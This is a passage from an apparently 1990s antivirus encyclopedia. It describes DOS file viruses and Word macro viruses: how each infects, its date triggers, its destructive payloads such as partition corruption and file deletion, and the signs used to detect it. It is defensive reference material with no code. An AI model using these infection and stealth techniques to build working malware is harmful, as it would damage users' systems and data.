  7776. Virus Length:  976 bytes
  7777.  
  7778. PC Vectors Hooked:  INT 21h
  7779.  
  7780. Execution Procedure:
  7781. 1) The virus decodes.
  7782. 2) Checks whether it is resident in the memory. If not, it loads itself
  7783.    resident in the high memory.
  7784. 3) Hooks INT 21h and infects all COM files on the current directory (it
  7785.    does not infect the same file again).
  7786. 4) Checks whether the current minute is 17. If it is, it makes some
  7787.    modifications on the Partition to keep the system from booting
  7788.    correctly.
  7789.  
  7790. Infection Procedure:
  7791. 1) Hooks INT 21h to check whether it is memory resident.
  7792. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
  7793.    executed is an uninfected COM file, the virus infects it.
  7794.  
  7795. Damage: When the virus activates, it makes the screen flash once.
  7796. Then it changes data in the Partition. The change is achieved by
  7797. XORing every fourth byte of the four Partition records with 55 (there
  7798. are four Partition records in the Partition table).
  7799.  
  7800. Note: The date and time fields of infected files are not changed.
  7801.  
  7802. Detection method:  Infected files increase by 976 bytes.
  7803.  
  7804. [AST-1010]
  7805. Virus Name: Ast-1010
  7806. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7807. Virus Length: 1,010 bytes
  7808. PC Vectors Hooked:  INT 21h
  7809.  
  7810. Execution Procedure:
  7811. 1) The virus decodes.
  7812. 2) Checks whether it is memory resident. If not, it loads itself
  7813.     resident in the high memory.
  7814. 3) Hooks INT21h and infects all COM and EXE files on the current
  7815.     directory (it does not infect the same file again).
  7816. 4) Checks whether the current day is the 16th. If it is, it makes
  7817.     changes to the Partition to keep the system from booting correctly.
  7818.  
  7819. Infection Procedure:
  7820. 1) Hooks INT 21h to check whether it is memory resident.
  7821. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
  7822.     executed is an uninfected COM or EXE file, the virus infects it.
  7823.  
  7824. Damage: When the virus activates, it makes the screen flash once.
  7825. Then it modifies the Partition. The change is achieved by
  7826. XORing every fourth byte of four Partition records with 55 (there
  7827. are four Partition records in the partition table).
  7828.  
  7829. Note:
  7830. 1) Date and time fields of infected files are not changed.
  7831. 2) The method of checking whether the virus is memory resident
  7832.     is the same as the AST-976 virus. Thus, these two viruses can
  7833.     not stay memory resident at the same time.
  7834.  
  7835. Detection method: Infected files increase by 1010 bytes.
  7836.  
  7837. [Filler]
  7838. Virus Name: Filler
  7839. Virus Type: File Virus
  7840.  
  7841. Execution Procedure: When an infected file is executed, the virus
  7842. writes some garbage information into some sectors on the floppy
  7843. inserted in the A drive.
  7844.  
  7845. Damage: Destroys some sectors in the diskette inserted in the A
  7846. drive (starts from 0 side, 28 track, 1 sectors, damages 8 sectors).
  7847.  
  7848. [Path]
  7849. Virus Name: Path
  7850. Virus Type: File Virus (COM files)
  7851. Virus Length:  3+906 bytes
  7852.  
  7853. Execution Procedure:
  7854. 1) Decodes its later half.
  7855. 2) Checks for other infected files. If there is, it only infects
  7856.    one program. Otherwise, it goes back to run the original routine.
  7857.    The search path is the path set in PATH.
  7858.  
  7859. The condition for the infectable file is that it must be an uninfected
  7860. COM file with length between 10 bytes and 64000 bytes.
  7861.  
  7862. Damage: None
  7863.  
  7864. Note:
  7865. 1) Does not stay resident in memory.
  7866. 2) Date and time fields of infected files are not changed.
  7867. 3) Infected files increase by 906+G bytes (0<=G<=247).
  7868.  
  7869. [Flower]
  7870. Virus Name: Flower
  7871. Virus Type: File Virus (EXE files)
  7872. Virus Length:  883 bytes
  7873.  
  7874. Execution Procedure:
  7875. 1) Decodes its encoded section.
  7876. 2) Checks whether the current date is November 11, or whether the
  7877.     virus version is not less than 174. If one of these conditions is
  7878.     satisfied, the virus destroys the original program (Document) and
  7879.     goes back to run the original routine. Otherwise, it searches for
  7880.     the first uninfected file on the current directory and infects it.
  7881.     Then it searches for the first uninfected file on the subdirectory
  7882.     under the root directory
  7883.    and infects it.
  7884. 3) Goes back to run the original routine.
  7885.  
  7886. Every infected file has its own number. When it infects a file, it
  7887. increases the current number by 1. This number will be delivered to the
  7888. next infection process.
  7889.  
  7890. Damage: When the virus activates, the virus attaches a procedure
  7891. to the original procedure to display a message (An English poem whose
  7892. title is "FLOWER"). Then it destroys the original procedure by
  7893. overwriting its front data.
  7894.  
  7895. Note: Date fields of infected files are not changed; however, the
  7896. time fields are changed due to the encoding of the time fields.
  7897.  
  7898. [Grunt-3]
  7899. Virus Name: Grunt-3
  7900. Virus Type: File Virus (COM files)
  7901. Virus Length:  3+473 bytes
  7902.  
  7903. Execution Procedure:
  7904. 1) Decodes its later half section.
  7905. 2) Checks if there is an uninfected COM or EXE file on the current
  7906.     and all father directories. If there is, it checks whether the
  7907.     current year is not less than 1993 and it is Friday. If it is,
  7908.     it does not infect any files except for displaying the following:
  7909.  
  7910.     "This is a hot  LZ ...Eradicating the Enemy!".
  7911.  
  7912.     Otherwise, the virus infects it (it only infects one file at a
  7913.     time).
  7914.  
  7915. Damage: None
  7916.  
  7917. Note:
  7918. 1) Does not stay resident in memory.
  7919. 2) Date and time fields of infected files are not changed.
  7920.  
  7921. Detection method: Infected files increase by 473 bytes.
  7922.  
  7923. [Ultrasik-1967]
  7924. Virus Name: Ultrasik-1967
  7925. Virus Type: File Virus (EXE files)
  7926. Virus Length:  1967 bytes
  7927.  
  7928. Execution Procedure: Searches for an uninfected EXE file and
  7929. infects it. The searching path is from the current directory to its
  7930. subdirectory, to subdirectories under the last subdirectory, to the
  7931. root directory, to subdirectories under the root directory. After that,
  7932. it goes back to the original routine. If there is no infectable file,
  7933. it halts the system (the original plan is to format C. But it instead
  7934. halts the system due to a bad instruction in the viral code).
  7935.  
  7936. Damage: None
  7937.  
  7938. Note: Date and time fields of infected files are not changed.
  7939.  
  7940. Detection method:
  7941. 1) Infected files will increase.
  7942. 2) The algorithm is: First, add original length to let it become a
  7943.     multiple of 16. Then increases it by 1967 bytes.
  7944.  
  7945.  
  7946. [Madden]
  7947. Virus Name: Madden
  7948. Virus Type: File Virus (EXE files)
  7949. Virus Length:  1988 bytes
  7950.  
  7951. Execution Procedure: Searches for an uninfected EXE file and
  7952. infects it. The searching path is from the current directory to its
  7953. subdirectory, to the subdirectories under the last subdirectory, to the
  7954. root directory, to the subdirectories under root directory. After that,
  7955. it goes back to the original routine. If there is no infectable file,
  7956. the virus issues a strange sound that stops only when the system is
  7957. rebooted.
  7958.  
  7959. Damage: None
  7960.  
  7961. Note: Date and time fields of infected files are not changed.
  7962.  
  7963. Detection method:
  7964. 1) Infected files increase.
  7965. 2) The algorithm is: First add to the original length to let it become
  7966.     a multiple of 16, and then increase it by 1988 bytes.
  7967.  
  7968. [Madden-B]
  7969. Virus Name: Madden-B
  7970. Virus Type: File Virus (EXE files)
  7971. Virus Length:  1440 bytes
  7972.  
  7973. Execution Procedure: Searches for an uninfected EXE file and
  7974. infects it. The searching path is from the current directory to its
  7975. subdirectory, to the subdirectories under the last subdirectory, to the
  7976. root directory, to the subdirectories under the root directory. After
  7977. that, it goes back to the original routine. If there is no infectable
  7978. file, the virus issues a sound from high to low, from low to high, and
  7979. so on until the system is rebooted.
  7980.  
  7981. Damage: None
  7982.  
  7983. Note: Date and time fields of infected files are not changed.
  7984.  
  7985. Detection method:
  7986. 1) Infected files increase in length.
  7987. 2) The algorithm is: First add original length to let it become a
  7988.     multiple of 16, and then increase it by 1440 bytes.
  7989.  
  7990. [Prime]
  7991. Virus Name: Prime
  7992. Virus Type: File Virus (*.C*; mainly *.COM)
  7993. Virus Length:  580 bytes
  7994.  
  7995. PC Vectors Hooked: INT 01h, INT 03h, INT 24h
  7996.  
  7997. Execution Procedure:
  7998. 1) It decodes its later half section.
  7999. 2) Checks whether the current day is 1. If it is, it displays a message
  8000.    and rotates the screen from left to right once. No matter what
  8001.    the day is, it searches for an uninfected file on the current
  8002.    directory and infects it.
  8003. 3) Then ends.
  8004.  
  8005. Infection Procedure:
  8006. 1) Gets the original codes and encodes them with F3h.
  8007. 2) Gets the system time and encodes it with the virus' later half codes.
  8008. 3) Attaches virus code to the original file, followed by the original
  8009.    codes.
  8010.  
  8011. Hooks INT 01h, INT 03h to avoid the Debug program.
  8012. When this program is executed, it jumps to FE05Bh to reboot the
  8013. system. Hooks INT 24h to prevent write protection on the current
  8014. diskette. When INT 24h is called, it halts the system because
  8015. of a bad viral code.
  8016.  
  8017. Damage: Original programs are encoded, preventing them to execute
  8018. after the virus is executed.
  8019.  
  8020. Note:
  8021. 1) Does not stay resident in the memory.
  8022. 2) The virus halts the system when it detects an uninfectable
  8023.    *.C* file on the current directory.
  8024. 3) Date and time fields of infected files are not changed.
  8025.  
  8026. Detection method: Infected files increase by 580 bytes.
  8027.  
  8028. Cleaning Method: Delete the first 580 bytes on infected files. The
  8029. remaining bytes will XOR with F3h one by one.
  8030.  
  8031. [PSV-354]
  8032. Virus Name: Psv-354
  8033. Virus Type: File Virus (COM files)
  8034. Virus Length:  354 bytes
  8035.  
  8036. Execution Procedure:
  8037. 1) It decodes its later half section.
  8038. 2) Checks for uninfected COM files with lengths between 150 bytes
  8039.    and 65000 bytes. If there is/are, only infects one of them.
  8040.    Otherwise, it goes back to run the original routine.
  8041.  
  8042. Damage: None
  8043.  
  8044. Note:
  8045. 1) Does not stay resident in the memory.
  8046. 2) Date and time fields of infected files are not changed.
  8047. 3) Does not infect COMMAND.COM of DOS 5.0.
  8048.  
  8049. Detection method: Infected files increase by 354 bytes.
  8050.  
  8051. [PCBB]
  8052. Virus Name: Pcbb
  8053. Virus Type: Memory resident, File Virus (COM files)
  8054. Virus Length:  3+(1675-1687) bytes
  8055. PC Vectors Hooked: INT 09h, INT 1Ch, INT 21h
  8056.  
  8057. Execution Procedure:
  8058. 1) It decodes its later half section.
  8059. 2) Checks whether it is memory resident or not. If not, it
  8060.     loads itself resident into the high memory.
  8061. 3) Hooks  INT 21h,INT 09h,INT 1Ch and goes back to run the
  8062.     original routine.
  8063.  
  8064. Infection Procedure: Infection occurs when executing a program,
  8065. copying a file, changing the file's attribute, opening a file,
  8066. closing a file, or renaming a file (AH=56h). When it
  8067. infects a file, it checks first for the day of the week and selects
  8068. the corresponding encoding mode for that day. There are seven possible
  8069. encoding modes.
  8070.  
  8071. The virus does not infect the same file, and only infects files with
  8072. lengths between 16 bytes and 61440 bytes.
  8073.  
  8074. Symptom: While the virus is activated, the screen goes blank when the
  8075. total number of keys pressed is equal to 957. After this, the virus
  8076. resets the counter and restarts all over again. You can press the
  8077. Alt, Control, Shift left and right together to return the screen to
  8078. normal operation.
  8079.  
  8080. Damage: None
  8081.  
  8082. Note: It stays resident in the memory and uses 4K bytes.
  8083.  
  8084. Detection method:
  8085. 1) Date and time fields of infected files are changed.
  8086. 2) Infected files increase by 1675, 1677, 1679, 1679, 1680, 1683, or
  8087.     1687 bytes depending on the day (from Sunday to Saturday
  8088.     respectively).
  8089. 3) PCBB attaches itself at the end of infected files.
  8090.  
  8091. [Comspec]
  8092. Virus Name: Comspec
  8093. Virus Type: File Virus
  8094. Virus Length:  3424 bytes
  8095.  
  8096. Execution Procedure:
  8097. 1) Executes COMMAND.COM to create six copies of the virus file
  8098.    using six file names from the C:\DOS directory. These copies
  8099.    are saved in the current directory. If there is no C:\DOS
  8100.    directory, it creates a file named "COMSPEC."
  8101.  
  8102. Damage: It overwrites six files if it is executed in the C:\DOS
  8103. directory.
  8104.  
  8105. Detection method: Length of infected files is 3424.
  8106.  
  8107. [T-1000]
  8108. Virus Name: T-1000
  8109. Virus Type: File Virus (COM files)
  8110. Virus Length:  128 bytes
  8111.  
  8112. Execution Procedure:
  8113. 1) It decodes its later half section.
  8114. 2) Infects all COM files in the current directory.
  8115.  
  8116. Infection Procedure:
  8117. 1) Gets the system time and encodes it with the original
  8118.    procedure.
  8119. 2) Overwrites its first 128 bytes by the virus code. If it is
  8120.    less than 128 bytes, it will be 128 bytes after it has been
  8121.    infected. Otherwise, the size will not change.
  8122.  
  8123. Damage: Overwrites the first 127 bytes of the original file with
  8124. the virus code, thus corrupting the file.
  8125.  
  8126. Detection method: Date and time fields of infected files are changed.
  8127.  
  8128. [Seneca]
  8129. Virus Name: Seneca
  8130. Virus Type: File Virus (EXE files)
  8131. Virus Length:  392 bytes
  8132.  
  8133. Execution Procedure: The virus gets the system date and time and
  8134. infects the system depending on the following conditions:
  8135. (1)Current year is not larger than 1980 and current minute is
  8136.    less than 30, or current year is larger than 1980 and current
  8137.    day is not November 25: It infects all EXE files on the
  8138.    current and all father directories.
  8139. (2)Current  year is not larger than 1980 and current minute is
  8140.    not less than 30: It displays this message: "You shouldn't
  8141.    use your computer so much, it's bad for you and your computer."
  8142.    Then destroys the current diskette.
  8143. (3)Current year is larger than 1980 and current day is November
  8144.    25: It displays the following message:
  8145.  
  8146.        "HEY EVERYONE!!!"
  8147.        "Its Seneca's B-Day !  Let's Party!"
  8148.  
  8149.    Then destroys the current diskette. The method of destroying
  8150.    the diskette for (2) and (3) is:  Write some data onto the first
  8151.    255 sectors of the diskette, thus deleting important data on
  8152.    it.
  8153.  
  8154. Damage: In condition (1), infected files are destroyed because their
  8155. first 392 bytes are overwritten. In condition (2) and (3), the first
  8156. 255 sectors of the diskette are overwritten.
  8157.  
  8158. Note: Date and time fields of infected files are not changed.
  8159.  
  8160. Detection method: One of the messages above appears on the screen.
  8161.  
  8162. [WORD_Baby.A]
  8163.  
  8164. Virus Name: WORD_Baby.A
  8165. Virus Type: Word Macro Virus
  8166. Alias: Punten
  8167. Platform: Word 6/7
  8168. Number_of_macros: 10
  8169. Encrypted: Yes
  8170. Size_of_macros: 4322 Bytes
  8171. Place_of_origin: Unknown
  8172. Date_of_origin: Spring 1997
  8173. Payload: Yes
  8174. Trigger_date: March 24th, October 15th, 1st, 30th, September 21st
  8175. Password: None
  8176. Seen_In_The_Wild: No
  8177. Seen_where: UK
  8178.  
  8179. Description:
  8180.  
  8181. WORD_Baby.A infects the global template (normal.dot) when an infected
  8182. document is opened. Further documents become infected when they
  8183. are also opened and saved (FileSave and FileSaveAs).
  8184. Baby.A uses ToolsMacro and ToolsCustomize to make recognition
  8185. of an infected document more difficult (called macro stealth technique).
  8186. When a user selects ToolMacro/ToolsCustomize, the following message is
  8187. displayed:
  8188.  
  8189. "   57773LKOM !   "
  8190.  
  8191. The following messages are displayed when a user exits Microsoft Word:
  8192.  
  8193. On the 24th of March:
  8194.  
  8195. "   Stop Work Let's Party, this is my Day !   "
  8196.  
  8197. On the 1st after 3 p.m:
  8198.  
  8199. "   57773LK0M !   "
  8200.  
  8201. On the 15th of October:
  8202.  
  8203. "GiE, You're gettin' Old, Bro !"
  8204.  
  8205. On the 21st of September:
  8206.  
  8207. "   Cathy, this is your day. Have Fun !   "
  8208.  
  8209. When a document is printed on the 30th of each month, Baby.A inserts
  8210. the following text into the active document:
  8211.  
  8212. "   Punten ...   "
  8213. "   I Just Wanna Give a Shut Up to @Rapi.Kom:    "
  8214. "   Just Don't Make Any Destructive Virus Ok !   "
  8215. "   Insert "We're East-Man Remember !   "
  8216. "   Insert "Peace 2 all My Home-Bro' Out There !   "
  8217. "   Insert "I'm Outta here !! Mangga sadayana...    "
  8218.  
  8219. [WORD_Balu.A]
  8220.  
  8221. Virus Name: WORD_Balu.A
  8222. Virus Type: Word Macro Virus
  8223. Alias: None
  8224. Platform: Word 6/7
  8225. Number_of_macros: 2 or 1
  8226. Encrypted: Yes
  8227. Size_of_macros: 776 or 646 Bytes
  8228. Place_of_origin: Germany
  8229. Date_of_origin: Spring 1997
  8230. Payload: Yes
  8231. Trigger_date: April 5th, April 16th
  8232. Password: SSichliebeDich, SSICHLIEBEDICH
  8233. Seen_In_The_Wild: No
  8234. Seen_where:
  8235.  
  8236. Description:
  8237.  
  8238. WORD_Balu does not infect any other documents. It is classified as a
  8239. trojan horse.
  8240.  
  8241. Balu only works with the German version of Microsoft Word, since it
  8242. uses language specific macros.
  8243.  
  8244. On the 5th of April, Balu renames the following files:
  8245.  
  8246. "   c:\command.com" to "c:\kniffel\com.com   "
  8247. "   c:\msdos.sys" to "c:\kniffel\ms.sys   "
  8248. "   c:\io.sys" to "c:\kniffel\ii.sys   "
  8249.  
  8250. Balu's second payload adds the following password to saved documents:
  8251.  
  8252. "   SSichliebeDich   "
  8253. "   SSICHLIEBEDICH   "
  8254.  
  8255. On the 16th of April, Balu displays the following message:
  8256.  
  8257. "   Dicke aus Schwelm, ich werde Dich immer lieben, weil die Tⁿr
  8258. "   zu meinem Herzen immer fⁿr Dich offen steht, egal was passiert.  "
  8259. "   Ich hoffe Du verzeihst mir.   "
  8260. "   Dein balu aus Schwelm   "
  8261.  
  8262. [WORD_Barbaro.A:It]
  8263.  
  8264. Virus Name: WORD_Barbaro.A:It
  8265. Virus Type: Word Macro Virus
  8266. Alias: Nostradamus
  8267. Platform: Word 6/7
  8268. Number_of_macros: 3
  8269. Encrypted: No
  8270. Size_of_macros: 2813 Bytes
  8271. Place_of_origin: Italy
  8272. Date_of_origin: December 1996
  8273. Payload: Yes
  8274. Trigger_date: 31st
  8275. Password: None
  8276. Seen_In_The_Wild: No
  8277. Seen_where:
  8278.  
  8279. Description:
  8280.  
  8281. WORD_Barbaro infects the global template when an infected document
  8282. is opened. Further documents become infected when they are
  8283. saved (FileSalva).
  8284.  
  8285. WORD_Barbaro uses StrumMacro to make recognition of an infected
  8286. document more difficult (called macro stealth technique).
  8287.  
  8288. On the 31st of each month, Barbaro displays the following message:
  8289.  
  8290. "Barbaro impero dal terzo sarai soggiogato   "
  8291. "Gran parte d'individui della sua origine farα perire   "
  8292. "Per decesso senile avverrα la sua fine, il quarto colpirα   "
  8293. "Per timore che il sangue con il sangue morte ne derivi.   "
  8294. "   NOSTRADAMUS Virus   "
  8295.  
  8296. WORD_Barbaro only works with the Italian version of Microsoft Word,
  8297. since it uses language specific macros.
  8298.  
  8299. [WORD_ABC.A]
  8300.  
  8301. Virus Name: WORD_ABC.A
  8302. Virus type:  Word Macro Virus
  8303. Alias: None
  8304. Platform: Word 6/7
  8305. Number_of_macros: 3
  8306. Encrypted: Yes
  8307. Size_of_macros: 1836 (1801) Bytes
  8308. Place_of_origin: USA
  8309. Date_of_origin: Fall 1996
  8310. Destructive: No
  8311. Trigger_date: None
  8312. Password: None
  8313. Seen_In_The_Wild: No
  8314. Seen_where:
  8315.  
  8316. Description:
  8317.  
  8318. WORD_ABC.A infects the global template (normal.dot) when an infected
  8319. document is opened. Further documents become infected when they
  8320. are saved (FileSaveAs).
  8321.  
  8322. WORD_ABC.A is one of the very few non-destructive macro viruses. It
  8323. only infects other files and displays the following message:
  8324.  
  8325. "     I am happy; are you too?   "
  8326.  
  8327. When the "Colin" macro triggers, it adds the following text to the
  8328. File|Properties section of infected documents:
  8329.  
  8330. "   Smash Technology   "
  8331.  
  8332. "   Resist Oppression   "
  8333.  
  8334. [WORD_CeeFour.A]
  8335.  
  8336. Virus Name: WORD_Ceefour.A
  8337. Virus Type: Word Macro Virus
  8338. Alias: None
  8339. Platform: Word 6/7
  8340. Number_of_macros: 6
  8341. Encrypted: Yes
  8342. Size_of_macros: 4062 Bytes
  8343. Place_of_origin: USA
  8344. Date_of_origin: Spring 1997
  8345. Destructive: Yes
  8346. Trigger_date: April 1st
  8347. Password: None
  8348. Seen_In_The_Wild: No
  8349. Seen_where:
  8350.  
  8351. Description:
  8352.  
  8353. WORD_CeeFour.A infects the global template when an infected document
  8354. is opened. Further documents become infected when they are
  8355. saved.
  8356.  
  8357. WORD_CeeFour.A uses ToolsMacro and FileTemplates to make recognition of
  8358. an infected document more difficult (called macro stealth technique).
  8359.  
  8360. When a user selects on of the two options, CeeFour.A displays the
  8361. following message:
  8362.  
  8363. "   A serious error has occoured in sub program: MenuBar   "
  8364.  
  8365. When a document is saved on April 1st, CeeFour.A triggers and does the
  8366. following:
  8367.  
  8368. 1. LABEL the partition of the first hard drive to "   C4_BY_KARL   "
  8369.  
  8370. 2. Delete all files on C:\
  8371.  
  8372. 3. Delete C:\COMMAND.COM
  8373.  
  8374. 4. Delete C:\WINDOWS\WIN.COM
  8375.  
  8376. The following comments can be found in the CEEFOUR macro:
  8377.  
  8378. "   C-4 By Karl   "
  8379. "   You are about to have a very bad day.   "
  8380. "   It looks like C4 in the mothers arm.   "
  8381. "   We are both professional, This is personal.   "
  8382. "   And when Alexander saw the bredth of his domain he wept for there "
  8383. "   were no more worlds to conquer (benefits of a classical education)"
  8384. "   quotes from the masters!   "
  8385.  
  8386. [WORD_CeeFour.B]
  8387.  
  8388. Virus Name: WORD_Ceefour.B
  8389. Virus Type: Word Macro Virus
  8390. Alias: None
  8391. Platform: Word 6/7
  8392. Number_of_macros: 6
  8393. Encrypted: Yes
  8394. Size_of_macros: 4019 Bytes
  8395. Place_of_origin: UK
  8396. Date_of_origin: February 1997
  8397. Destructive: Yes
  8398. Trigger_date: April 1st
  8399. Password: None
  8400. Seen_In_The_Wild: Yes
  8401. Seen_where: UK
  8402.  
  8403. Description:
  8404.  
  8405. The main difference between this new variant and the previous
  8406. CeeFour.A virus is that the code has been slightly modified.
  8407.  
  8408. For more information, please refer to the CeeFour.A virus
  8409. description.
  8410.  
  8411.  
  8412. [WORD_Chaka.A]
  8413.  
  8414. Virus Name: WORD_Chaka.A
  8415. Virus Type: Word Macro Virus
  8416. Alias: None
  8417. Platform: Word 6/7
  8418. Number_of_macros: 1 or 3
  8419. Encrypted: No
  8420. Size_of_macros: 741 (845 or 843) Bytes
  8421. Place_of_origin: Germany
  8422. Date_of_origin: Summer 1997
  8423. Destructive: No
  8424. Trigger_date: None
  8425. Password: None
  8426. Seen_In_The_Wild: No
  8427. Seen_where:
  8428.  
  8429. Description:
  8430.  
  8431. WORD_Chaka.A infects the global template when an infected document is
  8432. opened. Further documents become infected when they are also
  8433. opened (FileOpen - DateiOeffnen in the German version of Microsoft
  8434. Word) or closed (DocClose - DateiSchliessen in the German version of
  8435. Microsoft Word).
  8436.  
  8437. WORD_Chaka does not do anything besides infecting other files.
  8438.  
  8439. [WORD_Chandigarh.A]
  8440.  
  8441. Virus Name: WORD_Chandigarh.A
  8442. Virus Type:  Word Macro Virus
  8443. Alias: None
  8444. Platform: Word 6/7
  8445. Number_of_macros: 1
  8446. Encrypted: Yes
  8447. Size_of_macros: 244 Bytes
  8448. Place_of_origin: India
  8449. Date_of_origin: May 1996
  8450. Destructive: No
  8451. Trigger_date: None
  8452. Password: None
  8453. Seen_In_The_Wild: No
  8454. Seen_where:
  8455.  
  8456. Description:
  8457.  
  8458. WORD_Chandigarh.A infects the global template when an infected document
  8459. is opened. Further documents become infected when they are also
  8460. opened (AutoOpen).
  8461.  
  8462. WORD_Chandigarh.A does nothing else besides infecting other files.
  8463.  
  8464. The following comment can be found inside the code of Chandigarh:
  8465.  
  8466. "   This Code was written in Chandigarh (India) on 01.05.1996   "
  8467.  
  8468.  
  8469. [WORD_Cheat.A]
  8470.  
  8471. Virus Name: WORD_Cheat.A
  8472. Virus Type:  Word Macro Virus
  8473. Alias: None
  8474. Platform: Word 6/7
  8475. Number_of_macros: 1
  8476. Encrypted: No
  8477. Size_of_macros: 249 Bytes
  8478. Place_of_origin: Unknown
  8479. Date_of_origin: Summer 1997
  8480. Destructive: No
  8481. Trigger_date: None
  8482. Password: None
  8483. Seen_In_The_Wild: No
  8484. Seen_where:
  8485.  
  8486. Description:
  8487.  
  8488. WORD_Cheat.A is another intended macro virus. Due to bugs in the code
  8489. it does not infect other files.
  8490.  
  8491.  
  8492. [WORD_Cheat.B]
  8493.  
  8494. Virus Name: WORD_Cheat.B
  8495. Virus Type: Word Macro Virus
  8496. Alias: None
  8497. Platform: Word 6/7
  8498. Number_of_macros: 1
  8499. Encrypted: No
  8500. Size_of_macros: 279 Bytes
  8501. Place_of_origin: Unknown
  8502. Date_of_origin: Summer 1997
  8503. Destructive: No
  8504. Trigger_date: None
  8505. Password: None
  8506. Seen_In_The_Wild: No
  8507. Seen_where:
  8508.  
  8509. Description:
  8510.  
  8511. WORD_Cheat.B is another intended macro virus. Due to bugs in the code
  8512. it does not infect other files.
  8513.  
  8514.  
  8515.  
  8516. [WORD_Vicis.A]
  8517.  
  8518. Virus Name: WORD_Vicis.A
  8519. Virus Type: Word Macro Virus
  8520. Alias: Vicissitator
  8521. Platform: Word 6/7
  8522. Number_of_macros: 1 or 2 (global template)
  8523. Encrypted: No
  8524. Size_of_macros: differs
  8525. Place_of_origin: Unknown
  8526. Date_of_origin: July 1997
  8527. Destructive: No
  8528. Trigger_date: None
  8529. Password: None
  8530. Seen_In_The_Wild: No
  8531. Seen_where:
  8532.  
  8533. Description:
  8534.  
  8535. WORD_Vicis.A infects the global template when an infected document is
  8536. saved. Further documents become infected when they are also
  8537. saved (FileSave).
  8538.  
  8539. WORD_Vicis.A is another polymorphic virus that changes itself.
  8540. Whenever a user saves a document while the global template (normal.dot)
  8541. is infected, WORD_Vicis.A calls its mutating code.
  8542.  
  8543. Due to a bug some variants will fail to infect further files.
  8544. Executing the corrupted FileSave macro causes Microsoft Word to
  8545. display an error message.
  8546.  
  8547. While simple scan string scanners should have no problem
  8548. detecting Vicis.A, exact CRC scanners will fail to do so.
  8549.  
  8550. WORD_Vicis.A uses ToolsMacro to make recognition of an infected
  8551. document more difficult (called macro stealth technique).
  8552. The following comment can be found within the ToolsMacro macro:
  8553.  
  8554. "   You have been Infected by the Vicissitator Macro Virus.   "
  8555. "   (C)1997 CyberYoda A Member of the SLAM Virus Team   "
  8556.  
  8557. WORD_Vicis.A was distributed in July, 1997 in a virus writing magazine.
  8558.  
  8559.  
  8560. [WORD_Black.A]
  8561.  
  8562. Virus Name: WORD_Black.A
  8563. Virus Type: Word Macro Virus
  8564. Alias: BlackDeath
  8565. Platform: Word 6/7
  8566. Number_of_macros: 3
  8567. Encrypted: Yes
  8568. Size_of_macros: 1355 Bytes
  8569. Place_of_origin: USA
  8570. Date_of_origin: June 1997
  8571. Destructive: Yes
  8572. Trigger_date: Friday 13th
  8573. Password: None
  8574. Seen_In_The_Wild: No
  8575. Seen_where:
  8576.  
  8577. Description:
  8578.  
  8579. WORD_Black infects the global template when an infected document
  8580. is opened. Further documents become infected when they are
  8581. also opened (AutoOpen).
  8582.  
  8583. The following comment can be found in the AutoExec macro:
  8584.  
  8585. "   REM  Fuck Micro$oft!   "
  8586.  
  8587. On Friday the 13th Black displays the following message:
  8588.  
  8589. "   Your computer is now lost to the ages...   "
  8590. "   WM.BlackDeath   "
  8591. "   Written on 6/6/1997   "
  8592.  
  8593. On the same day, Black deletes the following files:
  8594.  
  8595. "   C:\*.COM   "
  8596. "   C:\*.EXE   "
  8597. "   C:\WINDOWS\*.INI   "
  8598. "   C:\WINDOWS\*.COM   "
  8599. "   C:\WINDOWS\*.HLP   "
  8600. "   C:\WINDOWS\*.CPL
  8601. "   C:\WINDOWS\*.BMP   "
  8602. "   C:\AOL\ORGANIZER\*.*   "
  8603. "   C:\AOL\LDB\*.*   "
  8604.  
  8605.  
  8606. [WORD_AntiConcept.A]
  8607. Virus Name: WORD_AntiConcept.A
  8608. Virus Type: Word Macro Virus
  8609. Alias: WORD_Band
  8610. Number of Variants: 2
  8611. Platform: Word 6/7
  8612. Number_of_macros: 4 or 3
  8613. Encrypted: No
  8614. Size_of_macros: 1263 (1216) Bytes
  8615. Place_of_origin: USA
  8616. Date_of_origin: Summer 1997
  8617. Payload: No
  8618. Trigger_date: None
  8619. Password: None
  8620. Seen_In_The_Wild: No
  8621. Seen_where:
  8622.  
  8623. Description:
  8624.  
  8625. WORD_AntiConcept.A infects the global template (normal.dot) when an
  8626. infected document is opened. Further documents become infected when
  8627. they are saved (FileSave and FileSaveAs).
  8628.  
  8629. WORD_AntiConcept.A disables the Concept virus by removing some of its
  8630. macros.
  8631.  
  8632. When an infected document is opened for the first time,
  8633. WORD_AntiConcept displays the following message:
  8634.  
  8635. "   Your system may or may not be clean.   "
  8636. "   Please close CleanW and then open it again   "
  8637.  
  8638. WORD_AntiConcept.A is an unnatural devolved variant with FileNew
  8639. missing in its macro set. Due to the missing macro, Microsoft Word
  8640. displays an error message.
  8641.  
  8642.  
  8643. [WORD_Band]
  8644. Virus Name: WORD_Band
  8645. Virus Type: Word Macro Virus
  8646. Alias: WORD_AntiConcept.A
  8647. Number of Variants: 2
  8648. Platform: Word 6/7
  8649. Number_of_macros: 4 or 3
  8650. Encrypted: No
  8651. Size_of_macros: 1263 (1216) Bytes
  8652. Place_of_origin: USA
  8653. Date_of_origin: Summer 1997
  8654. Payload: No
  8655. Trigger_date: None
  8656. Password: None
  8657. Seen_In_The_Wild: No
  8658. Seen_where:
  8659.  
  8660. Description:
  8661.  
  8662. WORD_Band infects the global template (normal.dot) when an
  8663. infected document is opened. Further documents become infected when
  8664. they are saved (FileSave and FileSaveAs).
  8665.  
  8666. WORD_Band disables the Concept virus by removing some of its
  8667. macros.
  8668.  
  8669. When an infected document is opened for the first time, WORD_Band
  8670. displays the following message:
  8671.  
  8672. "   Your system may or may not be clean.   "
  8673. "   Please close CleanW and then open it again   "
  8674.  
  8675. WORD_Band is an unnatural devolved variant with FileNew missing in
  8676. its macro set. Due to the missing macro, Microsoft Word displays an
  8677. error message.
  8678.  
  8679.  
  8680.  
  8681. [WORD_Archer.A]
  8682. Virus Name: WORD_Archer.A
  8683. Virus Type: Word Macro Virus
  8684. Alias: ArchFiend
  8685. Platform: Word 6/7
  8686. Number_of_macros: 6
  8687. Encrypted: No
  8688. Size_of_macros: 2360 Bytes
  8689. Place_of_origin: USA
  8690. Date_of_origin: July 1997
  8691. Payload: Yes
  8692. Trigger_date: 5th
  8693. Password: Random
  8694. Seen_In_The_Wild: No
  8695. Seen_where:
  8696.  
  8697. Description:
  8698.  
  8699. WORD_Archer.A infects the global template (normal.dot) when an infected
  8700. document is opened. Further documents become infected when they
